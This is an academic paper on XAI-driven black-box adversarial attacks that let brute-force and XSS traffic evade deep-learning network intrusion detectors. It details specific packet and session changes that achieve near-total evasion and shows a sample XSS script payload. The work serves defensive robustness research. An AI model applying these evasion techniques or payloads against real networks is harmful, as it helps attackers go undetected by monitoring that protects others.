Xai-driven black-box adversarial attacks on network intrusion detectors

Okada, Satoshi; Jmila, Houda; Akashi, Kunio; Mitsunaga, Takuho; Sekiya, Yuji; Takase, Hideki; Blanc, Gregory; Nakamura, Hiroshi

doi:10.1007/s10207-025-01016-0

Xai-driven black-box adversarial attacks on network intrusion detectors

Regular Contribution
Open access
Published: 26 March 2025

Volume 24, article number 103, (2025)
Cite this article

Download PDF

You have full access to this open access article

International Journal of Information Security Aims and scope Submit manuscript

Xai-driven black-box adversarial attacks on network intrusion detectors

Download PDF

Satoshi Okada¹,
Houda Jmila²,
Kunio Akashi¹,
Takuho Mitsunaga³,
Yuji Sekiya¹,
Hideki Takase¹,
Gregory Blanc⁴ &
…
Hiroshi Nakamura¹

633 Accesses
Explore all metrics

Abstract

Deep Learning (DL) technologies have recently gained significant attention and have been applied to Network Intrusion Detection Systems (NIDS). However, DL is known to be vulnerable to adversarial attacks, which evade detection by introducing perturbations to input data. Meanwhile, eXplainable Artificial Intelligence (XAI) helps us to understand predictions made by DL models and is an essential technology for ensuring accountability. We have already pointed out that XAI is also helpful in identifying important features when making predictions and proposed XAI-driven white-box adversarial attacks on DL-based NIDS. In this study, we extend this work by transitioning from white-box to black-box attacks, thereby increasing the practical applicability of our methods. Furthermore, we implemented our proposed method in a real-world network environment and demonstrated the general effectiveness of our proposed method by targeting multiple NIDS models. Our experimental results show that the proposed black-box attacks achieve high evasion rates without compromising the malicious nature of the attack communications.

Adversarial Attacks on Network Intrusion Detection Systems Based on Federated Learning

ZeekFlow: Deep Learning-Based Network Intrusion Detection a Multimodal Approach

State of the Art Literature Review on Network Anomaly Detection with Deep Learning

Discover the latest articles, news and stories from top researchers in related subjects.

Artificial Intelligence

Use our pre-submission checklist

Avoid common mistakes on your manuscript.

1 Introduction

Machine learning technology has become more and more popular not only in academic and industrial research but also in society. It has been introduced in various applications such as image recognition, anomaly detection, text mining, and malware detection [10, 22, 31]. Among these machine learning algorithms, deep learning (DL), in particular, has gained significant attention for its astonishing performance, equivalent to or exceeding human capabilities (such as natural language processing and decision-making). The advancements in deep learning technology have been made possible thanks to the availability of large datasets for training neural networks, as well as the remarkable advancements in hardware technology [38].

Recently, DL technologies have been introduced into cyber security products such as Network Intrusion Detection Systems (NIDS). NIDS play an important role in detecting attackers’ malicious activities in networks by monitoring network traffic. In the past, they used signature detection techniques, which could only find existing attacks. However, behavioral anomaly detection has bloomed thanks to ML/DL. Thus, they are now receiving more and more attention [17, 32, 47, 49].

DL models have been pointed out to be vulnerable to adversarial attacks, in which attackers perturbed the input data to cause a machine learning model to make incorrect predictions [14, 18, 24]. To evaluate and improve the robustness of machine learning models against them, it is common to construct Adversarial examples (AEs) to demonstrate the upper bound of the robustness [3] and design solutions to manage such attacks. This approach has led to a notable increase in studies focusing on generating AEs.

Feature-space attacks, where attackers only modify the feature vectors input to the classification model, are efficient in the computer vision field where the mapping from the image space (called the problem space in this paper) to the feature space is invertible or differentiable. In such cases, it is easy to find the perturbation in the problem space (real images) corresponding to the modification in the feature space (perturbed feature vectors), because each feature can describe a pixel that can be reconstructed based on the feature value. However, this inverse feature mapping problem is not as straightforward when perturbing feature vectors describing network traffic, and the mapping from problem space (raw network traffic space) to feature space in NIDS is neither invertible nor differentiable [36]. Furthermore, the mapping to the problem space is further complicated by the need to verify not only the feasibility of the proposed attacks in the problem space but also that the mutated malicious traffic retains its malicious properties and successfully executes its intended attack. Considering these challenges, feature-space attacks cannot be directly applied to DL-based NIDS. Instead, alternative approaches must be developed to generate AEs specifically tailored for NIDS.

Recently, the connection between eXplainable Artificial Intelligence (XAI) and AEs has been pointed out [20, 21]. XAI offers us a way to understand the decision-making processes of DL-based models [40]. In the previous work [34], we have already pointed out that interpretations given by XAI are useful for generating effective and feasible AEs against DL-based NIDS. We implemented the XAI-driven adversarial attack method and confirmed its feasibility and high evasion rate.

1.1 Contribution

In this paper, we propose new problem-space adversarial attacks on DL-based NIDS. In our proposed method, we identify features significantly contributing to detection evasion and determine how they should be perturbed by utilizing XAI. By focusing on important features and minimizing the number of perturbed features, we address the inverse feature mapping problem. Specifically, we find feasible transformations in the problem space that correspond to the perturbations in the feature space. This approach enables us to generate highly evasive AEs by fully utilizing the feature space information.

We also clarify more specific contributions compared to our previous work [34]. The previous work has several limitations. The first is that the method was a white-box approach, where the attacker has full access to the targeted NIDS information. Such a scenario is often pointed out to be impractical in previous studies [4, 11, 12]. The second limitation is that the evaluation was not convincing enough to show the general effectiveness because only one type of dataset (CIC-IDS2017) was used to construct the targeted NIDS model. In this paper, we address the drawbacks in the following ways:

By introducing an XAI method that does not utilize the internal information of the targeted AI, we improve the existing method from a white-box approach to a black-box approach.
To demonstrate the generalizability of our proposed method, we evaluated it across multiple NIDS models and attack scenarios.

Our proposed method is a black-box approach conducted in the problem space, making it more representative of real-world attack scenarios. Thus, it is useful for developers of DL-based NIDS. For instance, by executing realistic adversarial attacks using our approach, developers can perform practical robustness evaluations of their NIDS models. Furthermore, the adversarial examples generated by our method can be directly applied to adversarial training, enabling developers to strengthen their models’ robustness to such attacks.

1.2 Organization of the Paper

We introduce necessary background information to our research, such as adversarial attacks and XAI, in Sect. 2. Then, we introduce related research in Sect. 3. The white-box approach pointed out in our previous work is explained in Sects. 4. Section 5 describes our proposals. We provide the experimental settings and describe the results in Sect. 6. Section 7 concludes this paper.

2 Background

2.1 DL-based NIDS

NIDS are designed to monitor network traffic for suspicious activities and potential threats. Unlike Host-based Intrusion Detection Systems (HIDS), which are installed on individual computers to monitor inbound and outbound packets only from that particular host, NIDS are deployed at strategic points within the network to inspect all traffic in the network [2]. This makes NIDS particularly effective in detecting attacks that might not be visible at the host level, such as distributed denial-of-service (DDoS) attacks. Initial NIDS mainly used human-made signatures. However, recently, NIDS have started to adopt behavioral anomaly detection typically based on ML/DL techniques and have become able to detect unknown malicious traffic [5]

An important aspect of DL-based NIDS is its classification capability. They can be configured for binary classification, distinguishing between benign and malicious traffic, or for multi-classification, which involves identifying the specific type of attack. Depending on the required capability of NIDS, training methods also differ. For instance, supervised learning methods with “mixed datasets" containing both benign and malicious traffic are often adopted to train multi-classification models. This approach is similar to signature-based detection but with signatures being automatically learned by using ML/DL. Meanwhile, if NIDS models conduct anomaly detection, they can be trained by datasets consisting solely of legitimate traffic.

2.2 Adversarial Examples

AEs cause misclassification in a machine learning model by manipulating input data. The attacker successfully manipulates the input data to cross a decision boundary, causing that input data to be misclassified. This attack can be formulated as follows [46].

$$\begin{aligned} \begin{aligned} \text {minimize} \quad&\Vert x' - x\Vert \\ \text {subject to} \quad&f(x') = l', \\&f(x) = l, \\&l \ne l', \\&x' \in [0,1]^m, \end{aligned} \end{aligned}$$

(1)

where $x \in [0,1]^m$ is an input to a classifier f, l is the correctly predicted class for x, and $l' \ne l$ is the target class for $x' = x+r$, with $r \in [0,1]^m$ being a small perturbation to x.

Adversarial attacks are also classified based on the information available to the attacker. If an attacker knows all information, including input and output data, as well as the weights and classification labels of the target model, the attack is deemed a white-box attack. On the other hand, an attack conducted under conditions where the attacker only has access to information about the input/output data is called a black-box attack. Gray-box attacks lie in between white-box and black-box attacks, where the attacker possesses partial knowledge or limited access to the victim model.

2.3 Explainable Artificial Intelligence

In recent years, DL-based systems are increasingly being introduced across several domains. However, the non-linear nature of deep learning models, particularly those involving multiple layers of transformations, makes their decision-making processes opaque and difficult to interpret. In other words, these models can capture complex patterns, but the intricate, non-linear relationships between inputs and outputs are often “black boxes", where the reasoning behind predictions is not easily understood. That is why XAI has gained much attention these days. XAI provides us with some helpful information to understand the decision-making process of ML or DL systems.

KernelSHAP [27], a method introduced for explaining the predictions of any machine learning model, is based on Shapley values from cooperative game theory. Formally, let a function $ f: {\mathbb {R}}^n \rightarrow {\mathbb {R}} $ represent a machine learning model, and an input $ x \in {\mathbb {R}}^n $. KernelSHAP estimates the contribution of each feature to the final prediction by considering all possible subsets of the input features and computing the average marginal contribution of a feature across these subsets. The Shapley value $ \phi _i $ for a feature $ x_i $ is defined as:

$$\begin{aligned} \phi _i = \sum _{S \subseteq N \setminus \{i\}} \frac{|S|!(|N|-|S|-1)!}{|N|!} \left( f(S \cup \{i\}) - f(S) \right) \end{aligned}$$

where $ N $ is the set of all features, $ S $ is a subset of $ N $ that does not include $ i $, and $ f(S) $ represents the prediction of the model when only the features in $ S $ are present. One significant advantage of KernelSHAP is that it does not require any internal information about the model, such as weights, gradients, or biases. This makes KernelSHAP a model-agnostic approach. In this paper, we adopt KernelSHAP as it can be applied to any machine learning model, making it a versatile tool for interpreting our targeted NIDS model, which uses tabular data.

3 Related Research

3.1 DL-based IDS/NIDS

Intrusion Detection Systems (IDS) are essential tools for detecting malicious activities in cyber environments [19]. IDS are typically categorized into Host-based IDS (HIDS), which operate on individual devices, and Network-based IDS (NIDS), which monitor traffic across networks [33]. In recent years, DL techniques have gained a lot of attention in the development of IDS/NIDS due to their ability to automatically learn complex patterns and features from large-scale network data. The application of DL in IDS/NIDS has shown promising results across various domains such as IoT [48], automobiles [23], and ICS [16].

Of these various types of IDS, we focus on DL-based NIDS in this study. DL-based NIDS has gained Zhang et al. [52] proposed an MSCNN-LSTM model that integrates spatial and temporal feature extraction to improve detection accuracy on the UNSW-NB15 dataset. Sowah et al. [42] utilized artificial neural networks (ANN) for intrusion detection in mobile ad hoc networks (MANETs), demonstrating effective attack prevention and node reconfiguration. Diro et al. [8] leveraged LSTM networks for distributed attack detection in fog-to-things communications, emphasizing scalability and lightweight solutions for IoT environments. Yahalom et al. [51] addressed the high false positive rates of anomaly-based IDS by exploiting hierarchical data structures to enhance practical deployment. Sun et al. [44] introduced TDL-IDS, employing transfer learning to overcome the challenge of limited labeled data for real-world scenarios.

3.2 Adversarial Attacks against DL-based NIDS

We categorize and introduce existing research on adversarial examples for DL-based NIDS into feature-space attacks and problem-space attacks. This categorization allows us to clarify the differences between our study and previous works, thereby highlighting our contributions.

In the field of adversarial attacks targeting ML-based NIDS, feature-space attacks assume the ability of attackers to modify feature vectors input to NIDS directly. Starting with white-box attacks, existing gradient-based AE generation algorithms were applied to evade a DL-based NIDS [30, 50]. Techniques for bypassing a particular NIDS model, Kitsune [32], were proposed by Clements et al. [6]. Additionally, strategies for circumventing GAN-based NIDS detection are introduced by Piplai et al. [37]. There also exist gray- and black-box attacks. A boundary-based method designed to produce AEs for DoS attacks was proposed by Peng et al. [35], and a method for generating AEs against botnet detectors by introducing random mutations to features was presented by Apruzzese et al. [1]. Lin et al. [26] developed a GAN-based approach to generate AEs without any knowledge of the NIDS’s internal structure or parameters.

Problem-space attacks directly modify or transform network traffic to evade detection. Hashemi et al. [13] proposed a white-box attack method for multiple NIDS models. Their maximum evasion rate for this proposed method in flow-based NIDS is limited to 68%. Regarding gray-box attacks, Stinson et al. [43] proposed techniques that evade botnet detection by introducing random mutations based on the information of the detection algorithm and its implementation. Homoliak et al. [15] proposed random obfuscation techniques for evading the detection of various classifiers. Han et al. [12] proposed a black-box attack that preserves the maliciousness of attack communications while being generic and minimally overhead-intensive.

First of all, feature-space attacks cannot be directly converted to actual network traffic because feature extraction in DL-based NIDSs is not always invertible [12]. Therefore, their feasibility is limited, and they are impractical. On the other hand, while problem-space attacks are more practical than feature-space attacks, existing problem-space attacks have several drawbacks compared to our proposed method. Firstly, Hashemi et al.’s method [13] is a type of problem-space white-box attack and its evasion rate is only 68% at most. Second, since other existing attacks do not fully utilize the information in the feature space, they have to add a relatively large amount of random perturbations to the attack communication. In contrast, our method uses XAI to select important features and finds modifications in the problem space that perturb them in the feature space. As a result, the modifications in the problem space are so minimal that they may not compromise the feasibility of AEs or the maliciousness of original attacker traffic.

4 XAI-driven White-box Attacks on NIDS

In this section, we introduce the details of the XAI-driven white-box attack methods we pointed out in [34].

4.1 Targeted NIDS and Threat Model

The attack method focuses on generating AEs against DL-based NIDS. General DL-based NIDS detection flow is described in Fig. 1. First, using a packet-capturing tool, traffic in the target network is captured. Next, features are extracted from captured raw traffic. If necessary, the extracted features are pre-processed for shaping. Finally, the extracted and shaped data are input to the NIDS model, and the model returns a binary value (0: benign, 1: malicious).

In this attack method, we assume a white-box attack scenario, where the attacker possesses full access to the internal details of the targeted NIDS model. Specifically, the attacker is assumed to have detailed knowledge of the model’s architecture, including the number and type of layers, weights, biases, activation functions, and hyperparameters. Furthermore, the attacker understands the feature set used by the NIDS, such as extracted network traffic characteristics, and the process by which these features are derived from raw traffic.

4.2 Details of the attack method

To achieve a high evasion rate of generated AEs, it is important to fully utilize information in the feature space. Therefore, our method identified effective perturbations in the feature space and then sought corresponding transformations in the problem space. However, there is an inverse feature mapping problem in the network domain: feature extraction functions are non-invertible and non-differentiable [36]. Due to this problem, the larger and more complex the perturbations in the feature space, the more difficult it becomes to find the corresponding problem-space transformations. To address it, we minimized the number of features perturbed in the feature space, aiming to simplify the feature-space perturbations. This approach also made our AEs more robust to pre-processing. For implementing effective AEs with a minimal number of perturbed features, we utilized XAI to identify key features that significantly contribute to evade detection. Additionally, to maintain semantics, we focused on perturbing the more independent features among the selected ones.

Our method consists of the following five major steps.

1.
We test the model and analyze False Negative (FN) samples using Integrated Gradients [45] as an XAI technique. Then, we select the top k most important features contributing to the targeted model’s decision on FN samples. In this research, we deal with the case where $k = 3$.
2.
We plot True Positive (TP) samples and FN samples in the k-dimensional graph, whose axes are the top k features.
3.
We calculate a correlation heatmap [29] and confirm how independent each important feature is.
4.
From the 3D graphs and heatmap, we select the most suitable feature to be perturbed
5.
We implement the perturbations (AEs) using the real environment and confirm whether they keep their original maliciousness

In Step (1), we utilize Integrated Gradients, which requires internal information about the targeted AI model, such as weights and biases. Thus, this method is a so-called “white-box attack." In Steps (1) and (2), we focus on FN and TP samples. That is because our goal of generating AEs is similar to transforming TP into FN. In Step (2), we plot, for instance, a graph like Fig. 2. This figure shows that TP samples are concentrated at the lower end of each axis. Meanwhile, some FN samples are situated at a higher value on both the feature B or C axes. Through the analyses, we can hypothesize that when generating AEs, we should increase the value of B or C of the malicious communication (in the direction of the white arrows in Fig. 2). For instance, if B is ‘URG flag Count,’ an attacker might send more packets with the URG flag or set the URG flag on attack packets to increase the feature value. Furthermore, if feature B is more independent than feature C, we select B as the most suitable feature to be perturbed in Step (4).

4.3 Evaluation

In our evaluation, we verified whether cyberattacks perturbed by our proposed method could evade detection by implementing them in a real-world network environment. When we prepared our targeted DL-based NIDS model, we trained it on a large-scale existing dataset and then fine-tuned it using a smaller set of network data generated in our real network environment. To ensure the effectiveness of this process, it was important to minimize the gap between the existing dataset and the data generated in the real network environment. Considering it, we chose the CIC-IDS2017 dataset [41] as training data because it provides detailed attack labels and descriptions of attack scenarios, which allowed us to closely replicate specific attack scenarios in our environment.

Our proposed method focuses on generating adversarial examples in the problem space. This means the selected attacks needed to be reproducible in our network environment. Although CIC-IDS2017 includes various attack scenarios, such as Brute Force, DoS, Heartbleed, Web Attack, Infiltration, Botnet, and DDoS, we chose XSS and Brute Force because their attack scenario was easier to interpret compared to other attacks. Furthermore, the two attacks have different characteristics: Brute Force is a common network-layer attack, while XSS vulnerabilities target the application layer. By using these two types of attacks, we could evaluate our method across different network layers.

We perturbed the two types of attack samples in an actual network environment and assessed the extent to which these AEs could evade detection of the NIDS model. As a result, our method attained evasion rates of 95.7% (for Brute Force) and 100.0% (for XSS). This means that the white-box attack method can generate highly evasive AEs for DL-based NIDS.

5 Our Proposal: XAI-driven Black-box Attacks on NIDS

In this section, we introduce our proposals. First, we identify two major drawbacks in the previous work [34] introduced in Sect. 4. Then, we explain the details of how our proposals address these limitations.

5.1 Limitations of the Previous Work

Impractical Attack Scenario: In the previous work, we used Integrated Gradients as an XAI method to measure the importance of features (Step 1 of our method introduced in Sect. 4.2). Integrated Gradients require not only the input and output information of the AI model being analyzed but also the gradient information. Consequently, the method introduced in Sect. 4.2 assumed a white-box scenario where the attacker has access to the internal information of the target NIDS model. However, in real-world attack scenarios, it is rare for attackers to have such access. Therefore, a white-box approach is not suitable for investigating the realistic robustness of DL-based NIDS against adversarial attacks.

Limited Evaluation Scope: Another drawback is the inadequate evaluations for the generalizability of the method. In the previous work, we implemented the white-box attacks and perturbed two types of attacks (XSS and Brute Force attack) to see if they could evade detection by an NIDS based on the CIC-IDS2017 dataset. However, this is insufficient to claim the method’s generalizability. To demonstrate it, it is necessary to validate the method across multiple datasets and different NIDS models.

5.2 Details of Our Proposals

In order to address the two drawbacks described in Sect. 5.1, we improve the existing work in the following two points.

First, to achieve more realistic and feasible adversarial attacks against DL-based NIDS, we improve the existing method by using KernelSHAP instead of Integrated Gradients to select important features. KernelSHAP does not need any of its internal information, such as gradients. This allows us to extend the existing method to a black-box approach, contributing to a more practical evaluation of the robustness of DL-based NIDS against adversarial attacks compared to the existing methods.

Second, to prove the generalizability of our proposed method, we evaluate it on multiple NIDS models. We not only implement our adversarial attacks against the NIDS based on the CIC-IDS2017 dataset, which was examined in previous research, but also using the TON_IoT dataset [25]. Both the TON_IoT and CIC-IDS2017 datasets are highly relevant and widely used NIDS benchmark datasets, yet they have different feature sets and distinct data contents. By evaluating the effectiveness of our proposed method on NIDS based on these different datasets, we show that our method is generalizable and not dependent on specific datasets or scenarios.

5.3 Flow of XAI-driven Black-box Attacks on NIDS

We describe the detailed steps of our proposed XAI-driven black-box adversarial attacks. Similar to the white-box attack we previously proposed and described in Sect. 4, this black-box attack method aims to generate effective AEs with minimal number of perturbed features. To achieve this, we utilize XAI to identify important features that significantly contribute to evading detection. While the existing methods described in Sect. 4.2 used Integrated Gradients as the XAI model, our proposed method employs KernelSHAP instead, enabling a black-box approach.

1.
We test the model and analyze False Negative (FN) samples using KernelSHAP as an XAI technique. Then, we select the top k most important features contributing to the targeted model’s decision on FN samples. In this research, we deal with the case where $k = 3$.
2.
We plot True Positive (TP) samples and FN samples in the k-dimensional graph, whose axes are the top k features.
3.
We calculate a correlation heatmap [29] and confirm how independent each important feature is.
4.
From the 3D graphs and heatmap, we select the most suitable feature to be perturbed
5.
We implement the perturbations (AEs) using the real environment and confirm whether they keep their original maliciousness

6 Experimental Results and Discussion

We implemented our proposed method described in Sect. 5 and perturbed two types of attacks, Brute Force attacks and Cross-Site Scripting (XSS), in an actual network environment. We prepared two types of NIDS models with different sets of input features and measured the evasion rates of the generated adversarial examples against each model. In this section, we first explain our experimental environment and implementation details of the targeted NIDS model. Then, we show the experimental results of the two attack cases and finally discuss the results.

6.1 Environment Settings

We are required to prepare a real network environment to measure the performance (feasibility and detection evasion rate) of our proposed black-box attacks, as described in Sect. 5. In the environment, an attacker host (Kali Linux) and a victim server (CentOS) are set up on the same network so that they can communicate with each other (Fig. 3). Both machines are virtual machines built on virtualization software, VMware Fusion. All network traffic actually occurred and was captured using Wireshark. Then, feature extractors capture features from the collected data. To maintain feature consistency with the training dataset used to build the base model of our targeted NIDS models, we adopted CICFlowMeter and Zeek (Bro) for each targeted NIDS model.

6.2 Targeted NIDS Model

Our targeted NIDS models consist of an input layer, two hidden layers (with 256 neurons), and an output layer. During the learning process, we compute the cross-entropy between the labels and predictions as a loss function. The Adam optimizer (Adaptive Moment Estimation) is utilized with a learning rate of 0.01. This architecture is typical for a feedforward neural network and was also adopted in previous works [30]. To construct an NIDS model with sufficient accuracy, we need a sufficiently large and varied set of training data. However, it was difficult for us to generate such training data by using our own environment. Therefore, we first trained the targeted model using public datasets, which contain a high volume of traffic. Subsequently, we fine-tuned it with benign and malicious data generated from our environment to build the final NIDS model. To evaluate the generalizability of our proposed method, we prepare NIDS models based on different datasets: CIC-IDS2017 dataset-based model and TON_IoT dataset-based model.

We apply some pre-processing to the datasets and the data collected from our network environment:

Feature removal: We removed features corresponding to Flow ID, Src IP, Src Port, Dst IP, Dst Port, and Timestamp because they are flow identifiers which could lead to erroneous shortcut learning of DL-NIDS [7]. We also calculated the ratio of missing values for each feature and removed those with a missing value ratio exceeding 50%.
Missing value handling: After the feature removal, we employed imputation techniques on the remaining features. For categorical features with missing values, we used the most frequent value for imputation. Numeric features with missing values were imputed using the mean.
Min-Max normalization: We normalized the data to ensure that features with larger values do not bias the classification process. This normalization scales the feature values to a [0, 1] range.
Binary labels: In one attack type, we merge multiple attack categories into a single binary feature. For instance, when dealing with brute force attacks (Sect. 6.3), we categorize both FTP and SSH brute force attack labels in CIC-IDS2017 under one label, malicious. As a result, we obtain binary labels: “benign" and “malicious."

6.3 Experiment 1: Brute Force Attack

We trained two types of NIDS model: one is based on the dataset from CIC-IDS2017 dataset, and the other one is based on the TON_IoT dataset. Subsequently, we performed fine-tuning for each model using benign and malicious data generated in our actual network environment, which was generated as follows:

Benign traffic: Legitimate client logins to an FTP server (vsftpd), along with file uploads and downloads.
Malicious traffic: FTP Brute Force attacks using FTP-Patator, which is also used in creating CIC-IDS2017 dataset [41].

After fine-tuning, we tested the models with test data collected from the real environment. As shown in Table 1, they classified benign and malicious traffic with high accuracy.

Table 1 Targeted NIDS model performances

Full size table

6.3.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

We generated AEs of Brute Force attacks by using our proposed method. The following enumerated items correspond to those in Sect. 4.2.

1.
Using XAI, we analyzed FN samples. We used the KernelSHAP implementation from Xplique [9] to calculate each feature’s mean impact for every FN sample. We selected the top 20 features in order of impact and plotted them in Fig. 4. From this figure, we focused on the top three most important features: (Fwd PSH Flags, Avg Packet Size, SYN Flag Count). The descriptions of these three features are as follows [41]:
- Fwd PSH Flags: Number of times the PSH flag was set in packets traveling in the forward direction (0 for UDP).
- Avg Packet Size: Average size of packet.
- SYN Flag Count: Number of packets with SYN.
2.
We created a three-dimensional graph (see Fig. 5). From this 3D scatter plot, it was clear that Fwd PSH Flags was more suitable to be perturbed than the other two features. Specifically, reducing its value could likely shift TP to FN.
3.
We checked the independence of each feature by creating a heatmap (Fig. 6) of their correlations. The figure showed that Fwd PSH Flags had a weak correlation with other features. Also, our qualitative analysis revealed that Fwd PSH Flags, being a TCP packets’ flag count in the forward direction (from a client to a server), had little relation to other flow data features.
4.
Based on the analyses of Fig. 5 and Fig. 6, we decided to generate adversarial examples by perturbing the Fwd PSH Flags to 0.
5.
We implemented Python scripts to perform FTP Brute Force attacks without setting a PSH flag. In other words, we set the PSH flag to 0 for all packets sent from the attacker. We also confirmed the perturbed attacks worked successfully.

Our proposed AEs did not affect the original maliciousness of attacker traffic at all. To evaluate the impact of these adversarial examples, we measured the evasion rate (i.e., the fraction of malicious communication misclassified as benign). The evasion rate was 95.65%, which indicates that our proposed adversarial examples evade detection with a fairly high probability.

6.3.2 Evaluation on TON_IoT Dataset-Based Model

Following the same procedure as described in Sect. 6.3.1, AEs were generated for the ToN_IoT dataset-based model.

1.
We analyzed the FN samples using XAI. The results are presented in Fig. 7. Based on the feature importance ranking from the graph, the top three important features identified are conn_state, service, and src_ip_bytes. However, conn_state represents the status and progress of a connection, indicating whether it is established, in progress, or has been terminated. making it difficult to be perturbed. Similarly, perturbing the value of service, which denotes the application protocol, is out of the perturbation scope because it is part of a flow identifier. Therefore, instead of these two features, we considered selecting the fourth most important feature, src_pkts, and the fifth most important feature, proto. However, proto, which represents the transport layer protocol (TCP or UDP), is also impossible to perturb. Additionally, proto is also a part of a flow identifier and out of perturbation scope. Therefore, we finally selected src_ip_bytes, src_pkts, and dst_ip_bytes. The detailed explanations of these three features are as follows:
- src_ip_bytes: Number of bytes sent by the FTP client.
- src_pkts: Number of packets sent by the client.
- dst_ip_bytes: Number of IP bytes sent by the FTP server.
2.
We plotted TP and FN samples in 3D space, as shown in Fig. 8. It can be observed that the FN samples are concentrated near the origin of the graph. Consequently, by perturbing TP samples to reduce the value of the most important feature, src_ip_bytes, we can efficiently make them evade detection by the NIDS.
3.
The heatmap (Fig. 9) showed that src_ip_bytes had a correlation with other features. However, the correlation was comparable to that of other features. Additionally, from a qualitative perspective, when a perturbation that reduces src_ip_bytes is applied, it affects both src_bytes and src_ip_pkts.
4.
Both src_ip_bytes and src_pkts have similar correlations with other features and share similar characteristics, so either one can be perturbed. However, src_ip_bytes had a bigger impact on FN samples than src_bytes. Thus, we decided to perturbe src_ip_bytes.
5.
We implemented the perturbation in the problem space by terminating the TCP session each time a login attempt was made with a set of username and password. Despite these perturbations, all Brute Force attacks were successful.

To evaluate the performance of the perturbed AEs, we measured the evasion rate, which was 100%, indicating that our proposed adversarial examples effectively bypassed detection of the TON_IoT Dataset-Based Model.

6.4 Experiment 2: XSS

In the XSS attack case, we prepared two types of NIDS models using the same methodology described in Sect. 6.3. Subsequently, we constructed a real-world environment for data collection to fine-tune our model. We set up a web server using Apache and prepared a simple e-commerce site, deliberately leaving an XSS vulnerability on the login page. For example, if an attacker entered <script>alert(‘xss’);</script> in the username field of the login form, a JavaScript alert, as depicted in Fig. 10, would appear on the screen. Data collected in such an environment include:

Benign traffic: Legitimate client logins and subsequent page browsing.
Malicious traffic: Various inputs of XSS vectors from [39] to the login page.

After fine-tuning, we evaluated the performance using test data, as illustrated in Table1, confirming the model’s high accuracy in classifying communications.

6.4.1 Evaluation on the CIC-IDS2017 Dataset-Based Model

The following enumerated items correspond to those in Sect. 4.2.

1.
The XAI analysis results of FN samples are shown in Fig. 11. From this figure, we selected the top three features (Fwd Seg Size Min, URG Flag Count, and Bwd Packet Length Min). The detailed descriptions of these three features are as follows:
- Fwd Seg Size Min: Minimum segment size observed in the forward direction.
- URG Flag Count: Number of packets with URG flag.
- Bwd Packet Length Min: Minimum size of packet in backward direction.
2.
We plotted TP and FN samples in 3D space, as shown in Fig. 12. The graph revealed that Fwd Seg Size Min was the most critical and easy-to-perturb feature to generate adversarial examples. Specifically, increasing its value seems to cause the change from TPs to FNs.
3.
We used a heatmap (Fig. 13) to verify the independence of each feature’s correlation. Fwd Seg Size Min had a sufficiently low correlation with other features, indicating it is more independent. Through experimental analyses, under XSS attacks, the attacker’s packets which segment size is minimum were SYN or ACK packets. We hypothesized perturbing these packets would have minimal impact on other features.
4.
Fwd Seg Size Min had the biggest impact on FN samples and was independent enough to be perturbed.
5.
We implemented the perturbation in the problem space by padding SYN and ACK packets from the attacker host. Even with such perturbations, all XSS attacks succeeded.

We also evaluated the evasion rate of the adversarial examples. The rate was 100%, which showed that our proposed adversarial examples could completely evade the detection of the NIDS.

6.4.2 Evaluation on TON_IoT Dataset-Based Model

Following the same procedure as described in Sect. 6.4.1, we generated AEs for the ToN_IoT dataset-based model.

1.
Fig. 14 shows the XAI analysis results of FN samples. Based on the feature importance ranking from the graph, the top three important features identified are proto, conn_state, and src_ip_bytes. However, we do not perturb proto because it is a part of a flow identifier. Furthermore, conn_state represents the summarized state for each connection, making it difficult to be perturbed. Thus, instead of these two features, we selected the fourth most important feature, src_pkts, and the fifth most important feature, duration. The detailed explanations of the selected three features are as follows:
- src_ip_bytes: Number of sender’s (Web client) IP bytes.
- src_pkts: Number of packets sent by the client.
- duration: How long the connection lasted.
2.
We plotted TP and FN samples in 3D space, as shown in Fig. 15. In this graph, the distributions of TP and FN overlap, making it difficult to distinguish between them. Therefore, we prepared an additional graph (Fig. 16) to plot only the FN samples. From these graphs, we can see that FN samples are concentrated near the origin of the graph while TP samples are relatively dispersed. This indicates that by decreasing the value of each feature, it is possible to evade the NIDS model’s detection.
3.
The heatmap (Fig. 17) showed that the correlation of duration is smaller than the other two features.
4.
Based on the analyses of Fig. 15, Fig. 16 and Fig. 17, we decided to generate AEs by manipulating the duration to be the closest to 0.
5.
By terminating the session each time an XSS payload is injected into the login website, we succeeded in making duration smaller. This perturbation did not affect the XSS attacks’ function at all.

Our proposed AEs achieved an evasion rate of 100%. These results demonstrate that our method is also effective against the TON_IoT Dataset-Based Model in the XSS attack scenario.

6.5 Discussion

We summarize the results of our experiments and compare them with those of our previous work [34] in Table 2. It illustrates that our proposed black-box attacks achieve high evasion rates across two different NIDS models and two attack scenarios. These results quantitatively prove the effectiveness of our proposed method in generating highly evasive AEs.

Table 2 Comparison of evasion rates between our proposed black-box attack and existing white-box attack

Full size table

Additionally, as seen from the table, our proposed black-box attack achieved the same evasion rates as the existing white-box attacks. This reveals that our proposed method successfully keeps high performance without requiring access to the internal information of targeted models, such as gradients. The success of our black-box approach shows that it is feasible to conduct practical and effective adversarial attacks on DL-based NIDS, addressing a significant drawback of the previous white-box method. It is also observed that our method achieves a high evasion rate for both of the two different NIDS models. This indicates that the effectiveness of our method is not limited to specific feature sets or training datasets. These results suggest that our black-box method can be effectively applied to a wide range of DL-based NIDS models by enhancing its utility and relevance in real-world scenarios. In conclusion, our proposed method can contribute to evaluating and enhancing the robustness of DL-based NIDS in more realistic scenarios.

On the other hand, our study has some potential improvements. The first limitation is that the constraints in our attack scenario are still relatively moderate. The KernelSHAP used as the XAI method in our proposed attacks requires access to both the input data and output scores of the targeted NIDS model (either probabilities or, in some cases, pre-softmax logits output). This means that our proposed attacks are categorized into Score-Based Black-box Attacks, as defined in [28]. However, in real-world scenarios, it is often the case that attackers do not have access to the output scores of the targeted NIDS. Therefore, we plan to improve our proposed method so that we can generate AEs under more restrictive and realistic conditions where such scores are not available. The second limitation is that, in our approach, the selection of features to be perturbed and the implementation of AEs in the problem space is manually conducted. Given that adversarial training requires a large number of AEs, this manual generation process is not practical. In our future work, we will focus on automating our proposed method, potentially by leveraging large language models (LLMs). The third limitation of this study is the lack of comparison with other works from the other state-of-the-art methods. Performing a quantitative comparison in terms of computational cost and runtime efficiency would help clarify the advantages of our proposed method. However, our current approach involves manual processes, making it difficult to measure computational complexity in a fair and consistent manner. As part of our future work, we plan to automate these processes, which will enable us to perform runtime comparisons with other existing methods.

7 Conclusion

